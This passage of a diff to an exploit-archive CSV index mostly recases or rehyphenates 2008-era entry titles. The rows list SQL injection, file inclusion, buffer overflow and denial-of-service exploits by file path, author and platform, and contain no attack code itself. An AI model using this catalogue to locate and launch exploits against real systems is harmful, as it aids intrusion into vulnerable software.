Vuln",2008-09-10,reptil,php,webapps,0 -6420,platforms/asp/webapps/6420.txt,"aspWebAlbum 3.2 Multiple Remote Vulnerabilities",2008-09-10,e.wiZz!,asp,webapps,0 +6420,platforms/asp/webapps/6420.txt,"aspwebalbum 3.2 Multiple Vulnerabilities",2008-09-10,e.wiZz!,asp,webapps,0 6421,platforms/php/webapps/6421.php,"Wordpress 2.6.1 (SQL Column Truncation) Admin Takeover Exploit",2008-09-10,iso^kpsbr,php,webapps,0 -6422,platforms/php/webapps/6422.txt,"phpVID 1.1 (XSS/SQL) Multiple Remote Vulnerabilities",2008-09-10,r45c4l,php,webapps,0 +6422,platforms/php/webapps/6422.txt,"phpvid 1.1 (xss/sql) Multiple Vulnerabilities",2008-09-10,r45c4l,php,webapps,0 6423,platforms/php/webapps/6423.txt,"Zanfi CMS lite / Jaw Portal free (page) SQL Injection Vulnerability",2008-09-10,Cru3l.b0y,php,webapps,0 6424,platforms/windows/dos/6424.html,"Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit",2008-09-11,"Jeremy Brown",windows,dos,0 6425,platforms/php/webapps/6425.txt,"PhpWebGallery 1.3.4 (XSS/LFI) Multiple Vulnerabilities",2008-09-11,IRCRASH,php,webapps,0 @@ -6025,7 +6025,7 @@ id,file,description,date,author,platform,type,port 6449,platforms/php/webapps/6449.php,"pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit",2008-09-13,Stack,php,webapps,0 6450,platforms/php/webapps/6450.pl,"Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit",2008-09-13,ka0x,php,webapps,0 6451,platforms/php/webapps/6451.txt,"Talkback 2.3.6 Multiple Local File Inclusion/PHPInfo Disclosure Vulns",2008-09-13,SirGod,php,webapps,0 -6452,platforms/php/webapps/6452.txt,"phpSmartCom 0.2 (LFI/SQL) Multiple Remote Vulnerabilities",2008-09-13,r3dm0v3,php,webapps,0 +6452,platforms/php/webapps/6452.txt,"phpsmartcom 0.2 (lfi/sql) Multiple Vulnerabilities",2008-09-13,r3dm0v3,php,webapps,0 6453,platforms/asp/webapps/6453.txt,"FoT Video scripti 1.1b (oyun) Remote SQL Injection Vulnerability",2008-09-13,Crackers_Child,asp,webapps,0 6454,platforms/windows/remote/6454.html,"Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053)",2008-09-13,haluznik,windows,remote,0 6455,platforms/php/webapps/6455.txt,"Linkarity (link.php) Remote SQL Injection Vulnerability",2008-09-13,"Egypt Coder",php,webapps,0 @@ -6041,7 +6041,7 @@ id,file,description,date,author,platform,type,port 6465,platforms/php/webapps/6465.txt,"Pre Real Estate Listings (search.php c) SQL Injection Vulnerability",2008-09-15,JosS,php,webapps,0 6466,platforms/php/webapps/6466.txt,"Link Bid Script 1.5 Multiple Remote SQL Injection Vulnerabilities",2008-09-15,SirGod,php,webapps,0 6467,platforms/php/webapps/6467.txt,"iScripts EasyIndex (produid) Remote SQL Injection Vulnerability",2008-09-16,SirGod,php,webapps,0 -6468,platforms/php/webapps/6468.txt,"Attachmax Dolphin <= 2.1.0 Multiple Remote Vulnerabilities",2008-09-16,K-159,php,webapps,0 +6468,platforms/php/webapps/6468.txt,"attachmax dolphin <= 2.1.0 Multiple Vulnerabilities",2008-09-16,K-159,php,webapps,0 6469,platforms/php/webapps/6469.txt,"Gonafish LinksCaffePRO 4.5 (index.php) SQL Injection Vulnerability",2008-09-16,sl4xUz,php,webapps,0 6470,platforms/asp/webapps/6470.txt,"Hotel reservation System (city.asp city) Blind SQL Injection Vulnerability",2008-09-16,JosS,asp,webapps,0 6471,platforms/multiple/dos/6471.pl,"QuickTime 7.5.5 / ITunes 8.0 Remote off by one Crash Exploit",2008-09-16,securfrog,multiple,dos,0 @@ -6052,7 +6052,7 @@ id,file,description,date,author,platform,type,port 6476,platforms/hardware/remote/6476.html,"Cisco Router HTTP Administration CSRF Command Execution Exploit",2008-09-17,"Jeremy Brown",hardware,remote,0 6477,platforms/hardware/remote/6477.html,"Cisco Router HTTP Administration CSRF Command Execution Exploit 2",2008-09-17,"Jeremy Brown",hardware,remote,0 6478,platforms/php/webapps/6478.txt,"Technote 7 (shop_this_skin_path) Remote File Inclusion Vulnerability",2008-09-17,webDEViL,php,webapps,0 -6480,platforms/php/webapps/6480.txt,"X10media Mp3 Search Engine 1.5.5 Remote File Inclusion Vulnerability",2008-09-17,THUNDER,php,webapps,0 +6480,platforms/php/webapps/6480.txt,"x10media mp3 search engine 1.5.5 - Remote File Inclusion Vulnerability",2008-09-17,THUNDER,php,webapps,0 6481,platforms/php/webapps/6481.c,"Femitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC",2008-09-17,LiquidWorm,php,webapps,0 6482,platforms/php/webapps/6482.txt,"addalink <= 4 Write Approved Links Remote Vulnerability",2008-09-17,Pepelux,php,webapps,0 6483,platforms/php/webapps/6483.txt,"E-Php CMS (article.php es_id) Remote SQL Injection Vulnerability",2008-09-18,HaCkeR_EgY,php,webapps,0 @@ -6136,15 +6136,15 @@ id,file,description,date,author,platform,type,port 6563,platforms/php/webapps/6563.txt,"phpOCS <= 0.1-beta3 (index.php act) Local File Inclusion Vulnerability",2008-09-25,dun,php,webapps,0 6564,platforms/php/webapps/6564.txt,"Vikingboard <= 0.2 Beta (task) Local File Inclusion Vulnerability",2008-09-25,dun,php,webapps,0 6565,platforms/windows/dos/6565.txt,"K-Lite Mega Codec Pack 3.5.7.0 Local Windows Explorer DoS PoC",2008-09-25,Aodrulez,windows,dos,0 -6566,platforms/php/webapps/6566.txt,"PHP infoBoard v.7 Plus Multiple Remote Vulnerabilities",2008-09-25,"CWH Underground",php,webapps,0 +6566,platforms/php/webapps/6566.txt,"php infoboard v.7 plus Multiple Vulnerabilities",2008-09-25,"CWH Underground",php,webapps,0 6567,platforms/php/webapps/6567.pl,"Libra PHP File Manager <= 1.18/2.0 Local File Inclusion Exploit",2008-09-25,Pepelux,php,webapps,0 6568,platforms/php/webapps/6568.txt,"PHP infoBoard v.7 Plus Insecure Cookie Handling Vulnerability",2008-09-25,Stack,php,webapps,0 6569,platforms/php/webapps/6569.txt,"Vikingboard <= 0.2 Beta SQL Column Truncation Vulnerability",2008-09-25,StAkeR,php,webapps,0 6570,platforms/windows/remote/6570.rb,"ICONICS Vessel / Gauge / Switch 8.02.140 ActiveX BOF Exploit (meta)",2008-09-25,"Kevin Finisterre",windows,remote,0 -6571,platforms/php/webapps/6571.txt,"openEngine <= 2.0 beta4 Remote File Inclusion Vulnerability",2008-09-25,dun,php,webapps,0 +6571,platforms/php/webapps/6571.txt,"openengine <= 2.0 beta4 - Remote File Inclusion Vulnerability",2008-09-25,dun,php,webapps,0 6572,platforms/php/webapps/6572.txt,"Atomic Photo Album 1.1.0pre4 (XSS/SQL) Remote Vulnerabilities",2008-09-25,d3v1l,php,webapps,0 6573,platforms/php/webapps/6573.pl,"LanSuite 3.3.2 (fckeditor) Arbitrary File Upload Exploit",2008-09-25,Stack,php,webapps,0 -6574,platforms/php/webapps/6574.php,"Atomic Photo Album 1.1.0pre4 Blind SQL Injection Exploit",2008-09-26,Stack,php,webapps,0 +6574,platforms/php/webapps/6574.php,"Atomic Photo Album 1.1.0pre4 - Blind SQL Injection Exploit",2008-09-26,Stack,php,webapps,0 6575,platforms/php/webapps/6575.txt,"barcodegen <= 2.0.0 (class_dir) Remote File Inclusion Vulnerability",2008-09-26,"Br0k3n H34rT",php,webapps,0 6576,platforms/php/webapps/6576.txt,"Ultimate Webboard 3.00 (Category) SQL Injection Vulnerability",2008-09-26,"CWH Underground",php,webapps,0 6577,platforms/php/webapps/6577.txt,"PromoteWeb MySQL (go.php id) Remote SQL Injection Vulnerability",2008-09-26,"CWH Underground",php,webapps,0 @@ -6155,7 +6155,7 @@ id,file,description,date,author,platform,type,port 6582,platforms/hardware/dos/6582.pl,"Windows Mobile 6.0 Device long name Remote Reboot Exploit",2008-09-26,"Julien Bedard",hardware,dos,0 6583,platforms/php/webapps/6583.txt,"Esqlanelapse Software Project <= 2.6.2 Insecure Cookie Handling Vuln",2008-09-26,ZoRLu,php,webapps,0 6584,platforms/php/webapps/6584.txt,"The Gemini Portal <= 4.7 Insecure Cookie Handling Vulnerability",2008-09-26,Pepelux,php,webapps,0 -6585,platforms/php/webapps/6585.txt,"openEngine 2.0 beta2 Remote File Inclusion Vulnerability",2008-09-26,Crackers_Child,php,webapps,0 +6585,platforms/php/webapps/6585.txt,"openengine 2.0 beta2 - Remote File Inclusion Vulnerability",2008-09-26,Crackers_Child,php,webapps,0 6586,platforms/php/webapps/6586.txt,"Crux Gallery <= 1.32 Insecure Cookie Handling Vulnerability",2008-09-26,Pepelux,php,webapps,0 6587,platforms/php/webapps/6587.txt,"The Gemini Portal (lang) Remote File Inclusion Vulnerabilities",2008-09-26,ZoRLu,php,webapps,0 6588,platforms/windows/dos/6588.txt,"MS Windows GDI+ (.ico File) Remote Division By Zero Exploit",2008-09-26,"laurent gaffiĂ© ",windows,dos,0 @@ -6187,22 +6187,22 @@ id,file,description,date,author,platform,type,port 6615,platforms/windows/dos/6615.html,"Opera 9.52 Window Object Suppressing Remote Denial of Service Exploit",2008-09-28,"Aditya K Sood",windows,dos,0 6616,platforms/windows/dos/6616.txt,"MS Windows Explorer Unspecified .ZIP File Denial of Service Exploit",2008-09-28,"fl0 fl0w",windows,dos,0 6617,platforms/php/webapps/6617.txt,"BbZL.PhP 0.92 (lien_2) Local Directory Traversal Vulnerability",2008-09-28,JiKo,php,webapps,0 -6618,platforms/php/webapps/6618.txt,"Joomla Component imagebrowser <= 0.1.5 RC2 Directory Traversal Vuln",2008-09-28,Cr@zy_King,php,webapps,0 +6618,platforms/php/webapps/6618.txt,"joomla component imagebrowser <= 0.1.5 rc2 - Directory Traversal vuln",2008-09-28,Cr@zy_King,php,webapps,0 6619,platforms/windows/dos/6619.html,"MS Internet Explorer GDI+ Proof of Concept (MS08-052)",2008-09-28,"John Smith",windows,dos,0 6620,platforms/php/webapps/6620.txt,"PHP-Fusion Mod freshlinks (linkid) Remote SQL Injection Vuln",2008-09-28,boom3rang,php,webapps,0 6621,platforms/php/webapps/6621.txt,"BbZL.PhP 0.92 Insecure Cookie Handling Vulnerability",2008-09-28,Stack,php,webapps,0 6622,platforms/multiple/dos/6622.txt,"Wireshark 1.0.x Malformed .ncf packet capture Local Denial of Service",2008-09-29,Shinnok,multiple,dos,0 -6623,platforms/php/webapps/6623.txt,"Events Calendar 1.1 Remote File Inclusion Vulnerability",2008-09-29,"k3vin mitnick",php,webapps,0 +6623,platforms/php/webapps/6623.txt,"events calendar 1.1 - Remote File Inclusion Vulnerability",2008-09-29,"k3vin mitnick",php,webapps,0 6624,platforms/php/webapps/6624.txt,"Arcadem Pro (articlecat) Remote SQL Injection Vulnerability",2008-09-29,"Hussin X",php,webapps,0 6625,platforms/php/webapps/6625.txt,"Post Comments 3.0 Insecure Cookie Handling Vulnerability",2008-09-29,Crackers_Child,php,webapps,0 6626,platforms/php/webapps/6626.txt,"PG Matchmaking Script Multiple SQL Injection Vulnerabilities",2008-09-29,"Super Cristal",php,webapps,0 6628,platforms/php/webapps/6628.txt,"ArabCMS (rss.php rss) Local File Inclusion Vulnerability",2008-09-29,JiKo,php,webapps,0 6629,platforms/php/webapps/6629.txt,"FAQ Management Script (catid) Remote SQL Injection Vulnerability",2008-09-30,"Hussin X",php,webapps,0 6630,platforms/windows/remote/6630.html,"Autodesk DWF Viewer Control / LiveUpdate Module Remote Exploit",2008-09-30,Nine:Situations:Group,windows,remote,0 -6631,platforms/php/webapps/6631.txt,"SG Real Estate Portal 2.0 Blind SQL Injection/Local File Inclusion Vulns",2008-09-30,SirGod,php,webapps,0 +6631,platforms/php/webapps/6631.txt,"SG Real Estate Portal 2.0 - Blind SQL Injection/Local File Inclusion Vulns",2008-09-30,SirGod,php,webapps,0 6632,platforms/php/webapps/6632.txt,"MiNBank 1.5.0 Multiple Remote File Inclusion Vulnerability",2008-09-30,DaRkLiFe,php,webapps,0 6633,platforms/php/webapps/6633.txt,"eFront <= 3.5.1 / build 2710 Remote Arbitrary Upload Vulnerability",2008-09-30,Pepelux,php,webapps,0 -6634,platforms/php/webapps/6634.php,"SG Real Estate Portal 2.0 Blind SQL Injection Exploit",2008-09-30,Stack,php,webapps,0 +6634,platforms/php/webapps/6634.php,"SG Real Estate Portal 2.0 - Blind SQL Injection Exploit",2008-09-30,Stack,php,webapps,0 6635,platforms/php/webapps/6635.txt,"SG Real Estate Portal 2.0 Insecure Cookie Handling Vulnerability",2008-09-30,Stack,php,webapps,0 6636,platforms/php/webapps/6636.txt,"Rianxosencabos CMS 0.9 Remote Blind SQL Injection Vulnerability",2008-09-30,ka0x,php,webapps,0 6637,platforms/php/webapps/6637.txt,"BookMarks Favourites Script (view_group.php id) SQL Injection Vuln",2008-09-30,"Hussin X",php,webapps,0 @@ -6230,7 +6230,7 @@ id,file,description,date,author,platform,type,port 6659,platforms/php/webapps/6659.txt,"Full PHP Emlak Script (arsaprint.php id) SQL Injection Vulnerability",2008-10-03,"Hussin X",php,webapps,0 6660,platforms/windows/dos/6660.txt,"Serv-U <= 7.3 (stou con:1) Denial of Service Vulnerability (auth)",2008-10-03,dmnt,windows,dos,0 6661,platforms/windows/remote/6661.txt,"Serv-U <= 7.3 Remote FTP File Replacement Vulnerability (auth)",2008-10-03,dmnt,windows,remote,0 -6662,platforms/php/webapps/6662.pl,"AdaptCMS Lite <= 1.3 Blind SQL Injection Exploit",2008-10-03,StAkeR,php,webapps,0 +6662,platforms/php/webapps/6662.pl,"AdaptCMS Lite <= 1.3 - Blind SQL Injection Exploit",2008-10-03,StAkeR,php,webapps,0 6663,platforms/php/webapps/6663.txt,"CCMS 3.1 (skin) Multiple Local File Inclusion Vulnerabilities",2008-10-03,SirGod,php,webapps,0 6664,platforms/php/webapps/6664.txt,"Kwalbum <= 2.0.2 Arbitary File Upload Vulnerability",2008-10-03,"CWH Underground",php,webapps,0 6666,platforms/windows/remote/6666.pl,"mIRC 6.34 Remote Buffer Overflow Exploit",2008-10-04,SkD,windows,remote,0 @@ -6243,9 +6243,9 @@ id,file,description,date,author,platform,type,port 6673,platforms/windows/dos/6673.txt,"FastStone Image Viewer 3.6 (malformed bmp image) Crash Exploit",2008-10-05,suN8Hclf,windows,dos,0 6674,platforms/php/webapps/6674.pl,"FOSS Gallery Public <= 1.0 Arbitrary Upload / Information c99 Expoit",2008-10-05,JosS,php,webapps,0 6675,platforms/php/webapps/6675.pl,"Galerie 3.2 (pic) WBB Lite Addon Blind SQL Injection Exploit",2008-10-05,J0hn.X3r,php,webapps,0 -6676,platforms/php/webapps/6676.txt,"OpenNMS < 1.5.96 Multiple Remote Vulnerabilities",2008-10-05,"BugSec LTD",php,webapps,0 +6676,platforms/php/webapps/6676.txt,"opennms < 1.5.96 Multiple Vulnerabilities",2008-10-05,"BugSec LTD",php,webapps,0 6677,platforms/php/webapps/6677.pl,"geccBBlite 2.0 (leggi.php id) Remote SQL Injection Exploit",2008-10-05,Piker,php,webapps,0 -6678,platforms/php/webapps/6678.txt,"Fastpublish CMS 1.9999 (LFI/SQL) Multiple Remote Vulnerabilities",2008-10-05,~!Dok_tOR!~,php,webapps,0 +6678,platforms/php/webapps/6678.txt,"fastpublish cms 1.9999 (lfi/sql) Multiple Vulnerabilities",2008-10-05,~!Dok_tOR!~,php,webapps,0 6679,platforms/php/webapps/6679.txt,"phpAbook <= 0.8.8b (COOKIE) Local File Inclusion Vulnerability",2008-10-05,JosS,php,webapps,0 6680,platforms/php/webapps/6680.txt,"FOSS Gallery Public <= 1.0 Arbitrary File Upload Vulnerabilities",2008-10-05,Pepelux,php,webapps,0 6681,platforms/php/webapps/6681.txt,"PHP-Fusion Mod manuals (manual) Remote SQL Injection Vulnerability",2008-10-05,boom3rang,php,webapps,0 @@ -6253,18 +6253,18 @@ id,file,description,date,author,platform,type,port 6683,platforms/php/webapps/6683.txt,"PHP-Fusion Mod recept (kat_id) SQL Injection Vulnerability",2008-10-05,boom3rang,php,webapps,0 6684,platforms/php/webapps/6684.txt,"PHP-Fusion Mod triscoop_race_system (raceid) SQL Injection Vuln",2008-10-05,boom3rang,php,webapps,0 6685,platforms/php/webapps/6685.txt,"asiCMS alpha 0.208 Multiple Remote File Inclusion Vulnerabilities",2008-10-06,NoGe,php,webapps,0 -6686,platforms/windows/remote/6686.txt,"Hammer Software MetaGauge 1.0.0.17 Directory Traversal Vulnerability",2008-10-06,"Brad Antoniewicz",windows,remote,0 +6686,platforms/windows/remote/6686.txt,"hammer software metagauge 1.0.0.17 - Directory Traversal vulnerability",2008-10-06,"Brad Antoniewicz",windows,remote,0 6687,platforms/php/webapps/6687.pl,"Yerba SACphp <= 6.3 (mod) Local File Inclusion Exploit",2008-10-06,Pepelux,php,webapps,0 6689,platforms/linux/dos/6689.txt,"Konqueror 3.5.9 (font color) Remote Crash Vulnerability",2008-10-06,"Jeremy Brown",linux,dos,0 6690,platforms/windows/remote/6690.html,"Skype extension for Firefox BETA 2.2.0.95 Clipboard Writing Vulnerability",2008-10-07,irk4z,windows,remote,0 -6691,platforms/php/webapps/6691.txt,"Yerba SACphp <= 6.3 Multiple Remote Vulnerabilities",2008-10-07,StAkeR,php,webapps,0 +6691,platforms/php/webapps/6691.txt,"yerba sacphp <= 6.3 Multiple Vulnerabilities",2008-10-07,StAkeR,php,webapps,0 6692,platforms/php/webapps/6692.txt,"Joomla Component com_hotspots (w) Remote SQL Injection Vulnerability",2008-10-07,cOndemned,php,webapps,0 6693,platforms/php/webapps/6693.txt,"YourOwnBux 4.0 (COOKIE) Remote SQL Injection Vulnerability",2008-10-07,Tec-n0x,php,webapps,0 6694,platforms/php/webapps/6694.txt,"PHP Realtor 1.5 (view_cat.php v_cat) Remote SQL Injection Vulnerability",2008-10-07,Mr.SQL,php,webapps,0 6695,platforms/php/webapps/6695.txt,"PHP Auto Dealer 2.7 (view_cat.php v_cat) SQL Injection Vulnerability",2008-10-07,Mr.SQL,php,webapps,0 6696,platforms/php/webapps/6696.txt,"PHP Autos 2.9.1 (searchresults.php catid) SQL Injection Vulnerability",2008-10-07,Mr.SQL,php,webapps,0 6697,platforms/php/webapps/6697.txt,"Built2Go PHP RealEstate 1.5 (event_detail.php) SQL Injection Vuln",2008-10-07,d3v1l,php,webapps,0 -6698,platforms/php/webapps/6698.txt,"TorrentTrader Classic <= 1.04 Blind SQL Injection Vulnerability",2008-10-07,BazOka-HaCkEr,php,webapps,0 +6698,platforms/php/webapps/6698.txt,"TorrentTrader Classic <= 1.04 - Blind SQL Injection Vulnerability",2008-10-07,BazOka-HaCkEr,php,webapps,0 6699,platforms/windows/remote/6699.html,"Microsoft PicturePusher ActiveX Cross Site File Upload Attack PoC",2008-10-08,Nine:Situations:Group,windows,remote,0 6700,platforms/php/webapps/6700.txt,"DFF PHP Framework API (Data Feed File) RFI Vulnerabilities",2008-10-08,GoLd_M,php,webapps,0 6701,platforms/php/webapps/6701.txt,"HispaH textlinksads (index.php) Remote SQL Injection Vulnerability",2008-10-08,InjEctOr5,php,webapps,0 @@ -6276,7 +6276,7 @@ id,file,description,date,author,platform,type,port 6707,platforms/php/webapps/6707.txt,"Gforge <= 4.5.19 Multiple Remote SQL Injection Vulnerabilities",2008-10-09,beford,php,webapps,0 6708,platforms/php/webapps/6708.txt,"Gforge <= 4.6 rc1 (skill_edit) SQL Injection Vulnerability",2008-10-09,beford,php,webapps,0 6709,platforms/php/webapps/6709.txt,"Joomla Component Joomtracker 1.01 Remote SQL injection Vulnerability",2008-10-09,rsauron,php,webapps,0 -6710,platforms/php/webapps/6710.txt,"Camera Life 2.6.2b4 (SQL/XSS) Multiple Remote Vulnerabilities",2008-10-09,BackDoor,php,webapps,0 +6710,platforms/php/webapps/6710.txt,"camera life 2.6.2b4 (sql/xss) Multiple Vulnerabilities",2008-10-09,BackDoor,php,webapps,0 6711,platforms/php/webapps/6711.htm,"Kusaba <= 1.0.4 Remote Code Execution Exploit #2",2008-10-09,Sausage,php,webapps,0 6712,platforms/php/webapps/6712.txt,"IranMC Arad Center (news.php id) SQL Injection Vulnerability",2008-10-09,"Hussin X",php,webapps,0 6713,platforms/php/webapps/6713.txt,"ScriptsEz Mini Hosting Panel (members.php) LFI Vulnerability",2008-10-09,JosS,php,webapps,0 @@ -6298,7 +6298,7 @@ id,file,description,date,author,platform,type,port 6730,platforms/php/webapps/6730.txt,"Joomla Component ownbiblio 1.5.3 (catid) SQL Injection Vulnerability",2008-10-11,H!tm@N,php,webapps,0 6731,platforms/asp/webapps/6731.txt,"Absolute Poll Manager XE 4.1 (xlacomments.asp) SQL Injection Vuln",2008-10-11,Hakxer,asp,webapps,0 6732,platforms/windows/dos/6732.txt,"MS Windows InternalOpenColorProfile Heap Overflow PoC (MS08-046)",2008-10-12,Ac!dDrop,windows,dos,0 -6733,platforms/php/webapps/6733.txt,"mini-pub 0.3 (LFD/CE) Multiple Remote Vulnerabilities",2008-10-12,muuratsalo,php,webapps,0 +6733,platforms/php/webapps/6733.txt,"mini-pub 0.3 (lfd/ce) Multiple Vulnerabilities",2008-10-12,muuratsalo,php,webapps,0 6734,platforms/php/webapps/6734.txt,"mini-pub 0.3 Local Directory Traversal / File Disclosure Vulnerabilities",2008-10-12,GoLd_M,php,webapps,0 6735,platforms/php/webapps/6735.php,"Globsy <= 1.0 Remote File Rewriting Exploit",2008-10-12,StAkeR,php,webapps,0 6736,platforms/php/webapps/6736.txt,"Real Estate Scripts 2008 (index.php cat) SQL Injection Vulnerability",2008-10-12,Hakxer,php,webapps,0 @@ -6324,7 +6324,7 @@ id,file,description,date,author,platform,type,port 6756,platforms/windows/dos/6756.txt,"VLC 0.9.2 Media Player XSPF Memory Corruption Vulnerability",2008-10-14,"Core Security",windows,dos,0 6757,platforms/windows/local/6757.txt,"MS Windows XP/2003 AFD.sys Privilege Escalation Exploit (K-plugin)",2008-10-15,"Ruben Santamarta",windows,local,0 6758,platforms/php/webapps/6758.txt,"AstroSPACES (id) Remote SQL Injection Vulnerability",2008-10-15,TurkishWarriorr,php,webapps,0 -6759,platforms/php/webapps/6759.txt,"myStats (hits.php) Multiple Remote Vulnerabilities Exploit",2008-10-15,JosS,php,webapps,0 +6759,platforms/php/webapps/6759.txt,"mystats (hits.php) Multiple Vulnerabilities exploit",2008-10-15,JosS,php,webapps,0 6760,platforms/php/webapps/6760.txt,"myEvent 1.6 (viewevent.php) Remote SQL Injection Vulnerability",2008-10-15,JosS,php,webapps,0 6761,platforms/windows/dos/6761.html,"Hummingbird <= 13.0 ActiveX Remote Buffer Overflow PoC",2008-10-16,"Thomas Pollet",windows,dos,0 6762,platforms/php/webapps/6762.txt,"CafeEngine Multiple Remote SQL Injection Vulnerabilities",2008-10-16,0xFFFFFF,php,webapps,0 @@ -6385,18 +6385,18 @@ id,file,description,date,author,platform,type,port 6819,platforms/php/webapps/6819.txt,"MindDezign Photo Gallery 2.2 (index.php id) SQL Injection Vulnerability",2008-10-23,"CWH Underground",php,webapps,0 6820,platforms/php/webapps/6820.pl,"MindDezign Photo Gallery 2.2 Arbitrary Add Admin Exploit",2008-10-23,"CWH Underground",php,webapps,0 6821,platforms/php/webapps/6821.txt,"miniPortail <= 2.2 (XSS/LFI) Remote Vulnerabilities",2008-10-23,StAkeR,php,webapps,0 -6822,platforms/php/webapps/6822.txt,"WebSVN <= 2.0 (XSS/FH/CE) Multiple Remote Vulnerabilities",2008-10-23,"GulfTech Security",php,webapps,0 -6823,platforms/php/webapps/6823.txt,"SiteEngine 5.x Multiple Remote Vulnerabilities",2008-10-23,xy7,php,webapps,0 +6822,platforms/php/webapps/6822.txt,"websvn <= 2.0 (xss/fh/ce) Multiple Vulnerabilities",2008-10-23,"GulfTech Security",php,webapps,0 +6823,platforms/php/webapps/6823.txt,"siteengine 5.x Multiple Vulnerabilities",2008-10-23,xy7,php,webapps,0 6824,platforms/windows/dos/6824.txt,"MS Windows Server Service Code Execution PoC (MS08-067)",2008-10-23,"stephen lawler",windows,dos,0 6825,platforms/windows/local/6825.pl,"VLC 0.9.4 .TY File Buffer Overflow Exploit (SEH)",2008-10-23,"Guido Landi",windows,local,0 -6826,platforms/php/webapps/6826.txt,"Joomla Component Archaic Binary Gallery 0.2 Directory Traversal Vuln",2008-10-24,H!tm@N,php,webapps,0 +6826,platforms/php/webapps/6826.txt,"joomla component archaic binary gallery 0.2 - Directory Traversal vuln",2008-10-24,H!tm@N,php,webapps,0 6827,platforms/php/webapps/6827.txt,"Joomla Component Kbase 1.0 Remote SQL Injection Vulnerability",2008-10-24,H!tm@N,php,webapps,0 6828,platforms/windows/remote/6828.html,"db Software Laboratory VImpX (VImpX.ocx) Multiple Vulnerabilities",2008-10-24,shinnai,windows,remote,0 6829,platforms/php/webapps/6829.txt,"Aj RSS Reader (EditUrl.php url) SQL Injection Vulnerability",2008-10-24,yassine_enp,php,webapps,0 6830,platforms/php/webapps/6830.txt,"NEPT Image Uploader 1.0 Arbitrary Shell Upload Vulnerability",2008-10-24,Dentrasi,php,webapps,0 6831,platforms/windows/local/6831.cpp,"TUGzip 3.00 archiver .ZIP File Local Buffer Overflow Exploit",2008-10-24,"fl0 fl0w",windows,local,0 6832,platforms/windows/dos/6832.html,"KVIrc 3.4.0 Virgo Remote Format String Exploit PoC",2008-10-24,LiquidWorm,windows,dos,0 -6833,platforms/php/webapps/6833.txt,"PHPdaily (SQL/XSS/LFD) Multiple Remote Vulnerabilities",2008-10-24,0xFFFFFF,php,webapps,0 +6833,platforms/php/webapps/6833.txt,"phpdaily (sql/xss/lfd) Multiple Vulnerabilities",2008-10-24,0xFFFFFF,php,webapps,0 6834,platforms/windows/dos/6834.c,"vicFTP 5.0 (LIST) Remote Denial of Service Exploit",2008-10-24,"Alfons Luja",windows,dos,0 6835,platforms/php/webapps/6835.txt,"BuzzyWall 1.3.1 (download id) Remote File Disclosure Vulnerability",2008-10-24,b3hz4d,php,webapps,0 6836,platforms/php/webapps/6836.txt,"Tlnews 2.2 Insecure Cookie Handling Vulnerability",2008-10-25,x0r,php,webapps,0 @@ -6416,7 +6416,7 @@ id,file,description,date,author,platform,type,port 6850,platforms/php/webapps/6850.txt,"MyKtools 2.4 (langage) Local File Inclusion Vulnerability",2008-10-27,x0r,php,webapps,0 6851,platforms/linux/local/6851.c,"Linux Kernel < 2.6.22 ftruncate()/open() Local Exploit",2008-10-27,gat3way,linux,local,0 6852,platforms/php/webapps/6852.pl,"e107 Plugin EasyShop (category_id) Blind SQL Injection Exploit",2008-10-27,StAkeR,php,webapps,0 -6853,platforms/php/webapps/6853.txt,"Questcms (XSS/Directory Traversal/SQL) Multiple Remote Vulnerabilities",2008-10-27,d3b4g,php,webapps,0 +6853,platforms/php/webapps/6853.txt,"questcms (xss/directory traversal/sql) Multiple Vulnerabilities",2008-10-27,d3b4g,php,webapps,0 6854,platforms/php/webapps/6854.txt,"Aiocp 1.4 (poll_id) Remote SQL Injection Vulnerability",2008-10-27,ExSploiters,php,webapps,0 6855,platforms/php/webapps/6855.txt,"MyKtools 2.4 Arbitrary Database Backup Vulnerability",2008-10-27,Stack,php,webapps,0 6856,platforms/php/webapps/6856.txt,"e107 Plugin BLOG Engine 2.1.4 Remote SQL Injection Vulnerability",2008-10-28,ZoRLu,php,webapps,0 @@ -6428,7 +6428,7 @@ id,file,description,date,author,platform,type,port 6862,platforms/php/webapps/6862.txt,"H2O-CMS <= 3.4 Insecure Cookie Handling Vulnerability",2008-10-29,Stack,php,webapps,0 6863,platforms/windows/dos/6863.pl,"PacketTrap TFTPD 2.2.5459.0 Remote Denial of Service Exploit",2008-10-29,"Jeremy Brown",windows,dos,0 6864,platforms/cgi/webapps/6864.txt,"Sepal SPBOARD 4.5 (board.cgi) Remote Command Exec Vulnerability",2008-10-29,GoLd_M,cgi,webapps,0 -6865,platforms/php/webapps/6865.txt,"e107 Plugin FM Pro 1- (FD/Upload/DT) Multiple Remote Vulnerabilities",2008-10-29,GoLd_M,php,webapps,0 +6865,platforms/php/webapps/6865.txt,"e107 plugin fm pro 1- (fd/upload/dt) Multiple Vulnerabilities",2008-10-29,GoLd_M,php,webapps,0 6866,platforms/php/webapps/6866.pl,"7Shop <= 1.1 Remote Arbitrary File Upload Exploit",2008-10-29,t0pP8uZz,php,webapps,0 6867,platforms/php/webapps/6867.pl,"Wordpress Plugin e-Commerce <= 3.4 Arbitrary File Upload Exploit",2008-10-29,t0pP8uZz,php,webapps,0 6868,platforms/php/webapps/6868.pl,"Mambo Component SimpleBoard <= 1.0.1 Arbitrary File Upload Exploit",2008-10-29,t0pP8uZz,php,webapps,0 @@ -6512,17 +6512,17 @@ id,file,description,date,author,platform,type,port 6947,platforms/php/webapps/6947.txt,"Downline Goldmine Category Addon (id) SQL Injection Vulnerability",2008-11-01,"Hussin X",php,webapps,0 6948,platforms/php/webapps/6948.txt,"YourFreeWorld Classifieds Hosting (id) SQL Injection Vulnerability",2008-11-01,"Hussin X",php,webapps,0 6949,platforms/php/webapps/6949.txt,"YourFreeWorld URL Rotator (id) Remote SQL Injection Vulnerability",2008-11-01,"Hussin X",php,webapps,0 -6950,platforms/php/webapps/6950.txt,"Downline Goldmine paidversion (tr.php id) SQL Injection Vulnerability",2008-11-02,"Hussin X",php,webapps,0 +6950,platforms/php/webapps/6950.txt,"Downline Goldmine paidversion (tr.php id) - SQL Injection Vulnerability",2008-11-02,"Hussin X",php,webapps,0 6951,platforms/php/webapps/6951.txt,"Downline Goldmine newdownlinebuilder (tr.php id) SQL Injection Vuln",2008-11-02,"Hussin X",php,webapps,0 6952,platforms/php/webapps/6952.txt,"YourFreeWorld Shopping Cart (index.php c) Blind SQL Injection 